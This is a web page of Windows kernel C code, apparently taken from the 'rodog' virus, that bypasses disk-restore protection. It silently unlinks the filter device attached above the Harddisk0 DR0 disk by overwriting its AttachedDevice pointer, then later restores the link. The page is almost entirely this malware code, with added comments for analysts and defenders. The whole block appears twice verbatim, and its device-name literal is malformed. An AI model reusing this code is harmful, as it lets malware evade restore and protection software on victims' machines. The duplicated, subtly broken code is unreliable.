Bypass RestoreSystem
来自 rodog病毒
// Credit (translated from the original): thanks to a contact on QQ who released an
// unpacked, downloader-free build of the rodog virus.
//
// Name of the DR0 device object of Harddisk0 that BypassDisk() looks up.
// The literal is reproduced exactly as printed on the page.
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
// Device object the lookup in BypassDisk() resolves to; NULL until BypassDisk() has run.
PDEVICE_OBJECT HddDr0Device = NULL;
// Device that was attached directly above DR0 when BypassDisk() ran, kept so that
// EndBypass() can write it back. Stays NULL if nothing was attached.
PDEVICE_OBJECT HddAttDevice = NULL;
// BypassDisk: unlink the device attached directly above the DR0 disk device.
//
// Looks up PCIHDD_DR0DEVICE_NAME, takes the device the file object was opened on
// (fileObject->DeviceObject), and atomically swaps its AttachedDevice pointer to NULL,
// saving the previous value in HddAttDevice. Per the page title this is the sample's
// "restore system" bypass; presumably the unlinked device is the disk-restore filter,
// which then no longer sits above DR0 in the stack — TODO confirm on a live stack.
//
// Notes for analysts and defenders:
//  - The link is cut by writing DEVICE_OBJECT.AttachedDevice directly instead of going
//    through IoDetachDevice, so the detached driver gets no notification. A protection
//    driver can detect this by periodically verifying that it is still reachable from
//    the device it attached to.
//  - Only the swap itself is atomic (InterlockedExchangePointer); nothing here
//    synchronizes with the I/O manager or with in-flight requests.
//  - status is checked by ASSERT only. In free (non-checked) builds ASSERT expands to
//    nothing, so a failed lookup leaves fileObject NULL and the next line dereferences it.
//  - HddDr0Device is kept in a global after ObDereferenceObject(fileObject) releases the
//    only reference this function holds; no ObReferenceObject on the device is visible.
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
// FILE_READ_ATTRIBUTES is the only access requested; hardObject receives the device
// object returned by the lookup and is not used again in this function.
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // Author's note: HddDr0Device->AttachedDevice is hardObject (presumably true only when exactly one device sits above DR0 — TODO confirm)
if(HddDr0Device->AttachedDevice)
{ // Save the device attached on DR0, then break the attachment; EndBypass restores it
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
// Release the file-object reference taken by IoGetDeviceObjectPointer.
ObDereferenceObject(fileObject);
}
// EndBypass: write the saved attachment back onto DR0.
//
// Does nothing unless BypassDisk() has stored both HddDr0Device and HddAttDevice.
// The restore is a plain pointer store (not interlocked, unlike the detach) and does
// not look at the current value of AttachedDevice, so anything attached to DR0 in the
// meantime would be overwritten. HddAttDevice is not cleared afterwards.
// For incident response: the window between BypassDisk() and EndBypass() is when the
// saved device is missing from DR0's AttachedDevice link; after this call the link
// holds the saved pointer again, so a one-off stack inspection afterwards can look clean.
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // Restore the device attached on DR0
HddDr0Device->AttachedDevice = HddAttDevice;
}
}
// Credit (translated from the original): thanks to a contact on QQ who released an
// unpacked, downloader-free build of the rodog virus.
//
// Name of the DR0 device object of Harddisk0 that BypassDisk() looks up.
// The literal is reproduced exactly as printed on the page.
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
// Device object the lookup in BypassDisk() resolves to; NULL until BypassDisk() has run.
PDEVICE_OBJECT HddDr0Device = NULL;
// Device that was attached directly above DR0 when BypassDisk() ran, kept so that
// EndBypass() can write it back. Stays NULL if nothing was attached.
PDEVICE_OBJECT HddAttDevice = NULL;
// BypassDisk: unlink the device attached directly above the DR0 disk device.
//
// Looks up PCIHDD_DR0DEVICE_NAME, takes the device the file object was opened on
// (fileObject->DeviceObject), and atomically swaps its AttachedDevice pointer to NULL,
// saving the previous value in HddAttDevice. Per the page title this is the sample's
// "restore system" bypass; presumably the unlinked device is the disk-restore filter,
// which then no longer sits above DR0 in the stack — TODO confirm on a live stack.
//
// Notes for analysts and defenders:
//  - The link is cut by writing DEVICE_OBJECT.AttachedDevice directly instead of going
//    through IoDetachDevice, so the detached driver gets no notification. A protection
//    driver can detect this by periodically verifying that it is still reachable from
//    the device it attached to.
//  - Only the swap itself is atomic (InterlockedExchangePointer); nothing here
//    synchronizes with the I/O manager or with in-flight requests.
//  - status is checked by ASSERT only. In free (non-checked) builds ASSERT expands to
//    nothing, so a failed lookup leaves fileObject NULL and the next line dereferences it.
//  - HddDr0Device is kept in a global after ObDereferenceObject(fileObject) releases the
//    only reference this function holds; no ObReferenceObject on the device is visible.
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
// FILE_READ_ATTRIBUTES is the only access requested; hardObject receives the device
// object returned by the lookup and is not used again in this function.
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // Author's note: HddDr0Device->AttachedDevice is hardObject (presumably true only when exactly one device sits above DR0 — TODO confirm)
if(HddDr0Device->AttachedDevice)
{ // Save the device attached on DR0, then break the attachment; EndBypass restores it
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
// Release the file-object reference taken by IoGetDeviceObjectPointer.
ObDereferenceObject(fileObject);
}
// EndBypass: write the saved attachment back onto DR0.
//
// Does nothing unless BypassDisk() has stored both HddDr0Device and HddAttDevice.
// The restore is a plain pointer store (not interlocked, unlike the detach) and does
// not look at the current value of AttachedDevice, so anything attached to DR0 in the
// meantime would be overwritten. HddAttDevice is not cleared afterwards.
// For incident response: the window between BypassDisk() and EndBypass() is when the
// saved device is missing from DR0's AttachedDevice link; after this call the link
// holds the saved pointer again, so a one-off stack inspection afterwards can look clean.
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // Restore the device attached on DR0
HddDr0Device->AttachedDevice = HddAttDevice;
}
}